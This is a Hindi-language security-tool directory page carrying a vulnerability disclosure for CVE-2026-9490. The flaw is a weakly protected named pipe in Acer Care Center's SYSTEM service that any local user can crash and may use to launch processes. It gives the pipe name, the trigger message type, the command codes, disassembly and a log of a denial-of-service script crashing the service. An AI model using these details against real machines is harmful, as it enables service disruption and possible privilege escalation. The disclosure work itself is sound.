Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-9490 — ACCSvc सेवा एक नामित पाइप बनाती है जिसमें कमजोर सुरक्षा विवरणक होता है जो किसी भी प्रमाणित उपयोगकर्ता को कनेक्ट करने और संदेश भेजने की अनुमति देता है। जब पाइप पर एक विशेष रूप से तैयार संदेश (संदेश प्रकार 0x03) भेजा जाता है, तो सेवा निकास कोड 1067 (ERROR_PROCESS_ABORTED) के साथ क्रैश हो जाती है। | Kitploit
उपकरण/GitHubGitHub/ugvxb/cve-2026-9490
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणरिवर्स इंजीनियरिंगपेनिट्रेशन टेस्टिंगबाइनरी विश्लेषण
GitHubugvxb/cve-2026-9490

CVE-2026-9490

रिपॉजिटरी देखें
43 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

ACCSvc सेवा एक नामित पाइप बनाती है जिसमें कमजोर सुरक्षा विवरणक होता है जो किसी भी प्रमाणित उपयोगकर्ता को कनेक्ट करने और संदेश भेजने की अनुमति देता है। जब पाइप पर एक विशेष रूप से तैयार संदेश (संदेश प्रकार 0x03) भेजा जाता है, तो सेवा निकास कोड 1067 (ERROR_PROCESS_ABORTED) के साथ क्रैश हो जाती है।

साझा करें

CVE ID: CVE-2026-9490
शोधकर्ता: Vo Duc Thang (ugvxb)
स्वीकृति: https://community.acer.com/en/kb/articles/19668

1. कार्यकारी सारांश

Acer Care Center सेवा (ACCSvc.exe) में एक गंभीर सुरक्षा कमज़ोरी की पहचान की गई है। यह कमज़ोरी किसी भी प्रमाणित स्थानीय उपयोगकर्ता को सिस्टम सेवा को क्रैश करने (सेवा से वंचित करना) और कमज़ोर रूप से सुरक्षित नामित पाइप इंटरफ़ेस के माध्यम से संभावित रूप से विशेषाधिकार बढ़ाने की अनुमति देती है।

यह सेवा, जो SYSTEM विशेषाधिकारों (LocalSystem) के साथ चलती है, एक नामित पाइप को अत्यधिक अनुमेय एक्सेस नियंत्रणों के साथ उजागर करती है जो सभी प्रमाणित उपयोगकर्ताओं को पढ़ने, लिखने और निष्पादित करने की अनुमति प्रदान करते हैं।


2. कमज़ोरी का विवरण

2.1 प्रभावित घटक

विशेषतामान
उत्पादAcer Care Center
घटकACCSvc.exe (ACC Service)
सेवा नामACCSvc
स्थापना पथC:\Program Files (x86)\Acer\Care Center\
सेवा खाताLocalSystem (NT AUTHORITY\SYSTEM)
प्रारंभ प्रकारAUTO_START
नामित पाइप\.\pipe\treadstone_service_LightMode

2.2 कमज़ोरी #1: सेवा से वंचित करना

विवरण

ACCSvc सेवा एक कमज़ोर सुरक्षा विवरणक के साथ एक नामित पाइप बनाती है जो किसी भी प्रमाणित उपयोगकर्ता को कनेक्ट करने और संदेश भेजने की अनुमति देता है। जब पाइप को एक विशेष रूप से तैयार किया गया संदेश (संदेश प्रकार 0x03) भेजा जाता है, तो सेवा निकास कोड 1067 (ERROR_PROCESS_ABORTED) के साथ क्रैश हो जाती है।

सुरक्षा विवरणक (SDDL)

root@kitploit:~
D:(D;OICI;GA;;;BG)(D;OICI;GA;;;AN)(A;OICI;GRGWGX;;;AU)(A;OICI;GA;;;BA)

SDDL विश्लेषण

प्रभाव

बिना किसी विशेष विशेषाधिकार के एक सामान्य उपयोगकर्ता ACCSvc सिस्टम सेवा को समाप्त कर सकता है, जिससे Acer Care Center की कार्यक्षमता अनुपलब्ध हो जाती है।

2.3 कमज़ोरी #2: संभावित स्थानीय विशेषाधिकार वृद्धि

विवरण

वही कमज़ोर नामित पाइप ACL प्रमाणित उपयोगकर्ताओं को कमांड संदेश भेजने की अनुमति देता है जो CreateProcessAsUserW के माध्यम से लॉन्चर एप्लिकेशन निष्पादित करने के लिए सेवा को ट्रिगर करते हैं।

कमांड कोड

कमांडहेक्स मानलक्ष्य निष्पादन योग्य
0x19065102501ACCAPPLauncher.exe
0x19066102502ACCSWALauncher.exe
0x19067102503ACCFixpackFolderCleaner.exe

3. तकनीकी विश्लेषण

3.1 बाइनरी विश्लेषण

विशेषतामान
फ़ाइलACCSvc.exe
प्रकारPE32+ executable (console) x86-64
विश्लेषण उपकरणRadare2

3.2 पहचाने गए मुख्य कार्य

3.3 नामित पाइप निर्माण पैरामीटर

root@kitploit:~
Pipe Name:        \\.\pipe\treadstone_service_LightMode
dwOpenMode:       0x03 (PIPE_ACCESS_DUPLEX)
dwPipeMode:       0x06 (PIPE_TYPE_MESSAGE | PIPE_READMODE_MESSAGE)
nMaxInstances:    255
nOutBufferSize:   512
nInBufferSize:    512
nDefaultTimeOut:  1000ms

3.4 कमांड वितरण तर्क

root@kitploit:~
0x140008b1a      mov ebx, dword [rdx + rcx]     ; Read command
0x140008b1d      lea eax, [rbx - 0x19065]       ; Subtract base
0x140008b23      cmp eax, 2                      ; Check range
0x140008b26      ja  0x140008bde                 ; Jump if invalid

4. शोषण परिणाम

root@kitploit:~
accesschk.exe -v \pipe\treadstone_service_LightMode
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
\\.\Pipe\treadstone_service_LightMode
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\Authenticated Users
        FILE_ADD_FILE
        FILE_CREATE_PIPE_INSTANCE
        FILE_APPEND_DATA
        FILE_EXECUTE
        FILE_LIST_DIRECTORY
        FILE_READ_ATTRIBUTES
        FILE_READ_DATA
        FILE_READ_EA
        FILE_TRAVERSE
        FILE_WRITE_ATTRIBUTES
        FILE_WRITE_DATA
        FILE_WRITE_EA
        SYNCHRONIZE
        READ_CONTROL
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
        
C:\Users\thang\Downloads\Acer>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

C:\Users\thang\Downloads\Acer>sc qc ACCSvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ACCSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files (x86)\Acer\Care Center\ACCSvc.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ACC Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\thang\Downloads\Acer>sc query ACCSvc

SERVICE_NAME: ACCSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

C:\Users\thang\Downloads\Acer>python exploit_dos.py
[*] ACCSvc DoS Attack
[*] Target: \\.\pipe\treadstone_service_LightMode
[+] DoS payload sent - service should crash

C:\Users\thang\Downloads\Acer>sc query ACCSvc

SERVICE_NAME: ACCSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 1067  (0x42b)
        SERVICE_EXIT_CODE  : 0 (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

परिणाम: सामान्य उपयोगकर्ता ने सफलतापूर्वक SYSTEM सेवा को क्रैश कर दिया!


5. जोखिम मूल्यांकन

5.1 CVSS v4.0 स्कोर

मीट्रिकमान
CVSS 4.0 VectorAV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/RE:M
CVSS आधार स्कोर6.8 (मध्यम)

5.2 CWE वर्गीकरण

CWE आईडीनाम
CWE-269अनुचित विशेषाधिकार प्रबंधन

6. अस्वीकरण

यह PoC केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए है। लेखक किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है। बिना प्राधिकरण के शोषण अवैध है।

टूल डाउनलोड करें
ACEप्रमुखअनुमतिमूल्यांकन
(D;OICI;GA;;;BG)बिल्टिन अतिथिसभी अस्वीकारसुरक्षित
(D;OICI;GA;;;AN)अनामसभी अस्वीकारसुरक्षित
(A;OICI;GRGWGX;;;AU)प्रमाणित उपयोगकर्तापढ़ना/लिखना/निष्पादितअसुरक्षित
(A;OICI;GA;;;BA)बिल्टिन प्रशासकसभी अनुमतिअपेक्षित
प्रवेश बिंदु
0x14000fd4c
कार्यपताउद्देश्य
fcn.140009a700x140009a70CreateNamedPipeW - असुरक्षित पाइप बनाता है
fcn.1400075700x140007570CreateProcessAsUserW - प्रक्रियाएँ उत्पन्न करता है
fcn.14000a8a00x14000a8a0ReadFile हैंडलर
fcn.1400099500x140009950WriteFile हैंडलर
fcn.1400080500x140008050संदेश प्रेषक